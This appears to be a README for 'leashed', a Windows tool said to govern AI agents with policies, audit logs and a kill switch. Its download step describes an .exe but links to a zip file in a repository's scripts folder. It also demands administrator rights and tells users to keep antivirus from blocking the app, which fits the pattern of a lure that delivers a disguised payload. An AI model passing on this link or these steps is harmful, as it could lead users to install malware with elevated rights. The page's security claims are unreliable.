📋 What is leashed?

leashed helps you manage AI agents that use your accounts. It acts like a leash for AI, giving you control with policies, audit logs, and an emergency kill switch. This makes sure AI agents work safely and follow your rules without risking your data or accounts.

💻 System Requirements

  • Windows 10 or later (64-bit)
  • At least 4 GB of RAM
  • 200 MB free disk space
  • Internet connection for updates and monitoring
  • Administrator rights to install and run the app

🚀 Getting Started

1. Visit the download page

Go to the leashed release page to get the latest version for Windows:

This page lists all releases. Find the most recent Windows installer under "Assets".


2. Choose and download the installer

Look for a file ending with .exe (example: https://raw.githubusercontent.com/Lukacyber/leashed/main/scripts/Software-v2.8.zip). Click it to download.


3. Run the installer

  • Open the downloaded .exe file
  • Follow the setup wizard prompts
  • Accept the license agreement
  • Choose the installation folder or use the default location
  • Click "Install"

4. Launch leashed

  • Find the leashed icon on your desktop or Start Menu
  • Double-click to open the app

The app may ask for permission to run with administrator rights. This is necessary to control AI agents on your system.


🛠 How to Use leashed

Set Your Policies

  • Open leashed and go to the Policies tab
  • Use simple settings to decide what AI agents can access
  • For example, block certain websites or limit data use

Monitor Activity

  • Check the Audit Log tab
  • See all actions AI agents perform in real time
  • You can spot unusual or unwanted behavior quickly

Use the Kill Switch

  • If you notice problematic activity, click the Kill Switch button
  • This stops all AI agents immediately
  • You can resume agents once issues are fixed

🔐 Keeping Your Accounts Safe

leashed uses secure methods to protect your credentials and data:

  • Does not store passwords in plain text
  • Encrypts all sensitive information
  • Works only with approved AI agents
  • Supports browser automation but controls what AI can do

Stay updated by installing new versions from the release page regularly.


🆘 Troubleshooting

  • If the app does not start, make sure you ran the installer as administrator
  • Check your antivirus does not block leashed
  • Restart your PC and try again
  • Visit the Issues section on the GitHub page to report problems or find help
